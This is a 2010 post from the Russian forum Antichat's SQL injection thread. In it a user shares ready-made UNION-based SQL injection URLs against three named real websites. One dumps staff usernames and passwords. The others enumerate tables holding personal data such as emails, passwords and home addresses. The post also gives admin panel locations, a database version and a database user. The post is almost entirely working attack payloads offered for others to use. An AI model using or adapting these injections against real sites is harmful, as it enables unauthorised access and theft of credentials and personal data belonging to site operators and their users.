Форум АНТИЧАТ - SQL Инъекции

#11

20.03.2010, 04:10

Dr..VATSON

Новичок

Регистрация: 07.12.2008

Сообщений: 12

Провел на форуме:
487591

Репутация: 43

Код:

http://jobmillion.com/en/member/detail-job.php?action=showlist&ID=-10+union+select+1,2,3,4,5,6,7,8,group_concat%28million_system_staff_Password%29,group_concat%28million_system_staff_UserName%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+million_system_staff%20--

Из таблицы million_system_staff

В Ы В О Д И Т С Я

million_system_staff_ID
million_system_staff_Name
million_system_staff_Email
million_system_staff_UserName
million_system_staff_Password
million_system_staff_CreateByID
million_system_staff_CreateBy
million_system_staff_CreateDate
million_system_staff_LastLoginDate
million_system_staff_Status
million_system_staff_Level

А Д М И Н К А

http://jobmillion.com/stats

Код:

http://www.infowomen.org/portfolio/clc/web_app/admin/job.php?job_id=-1+union+select+group_concat%28column_name%29+from+information_schema.columns+where+table_name=char%28116,98,108,95,112,101,114,115,111,110,115%29%20--

Из таблицы tbl_persons

В Ы В О Д И Т С Я

person_id
first_name
last_name
client_id
job_id
email_address
password
y_n_recipient

А Д М И Н К А

http://www.infowomen.org/admin

ТИЦ = 10

5.1.26-rc

AVTOTYRE@localhost

Код:

http://www.avto-tyre.ru/shop.php?id=-27+union+select+1,2,group_concat%28column_name%29,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns+where+table_name=char%2897,100,100,114,101,115,115%29%20--

Из таблицы address

address_id
user_id
name
index
region
city
street
telephon
info
address_id
user_id
index
region
district
city
name
telephon
fax
street
house
building
stroenie
flat
entrance
floor
code
info

Последний раз редактировалось Dr..VATSON; 20.03.2010 в 16:31..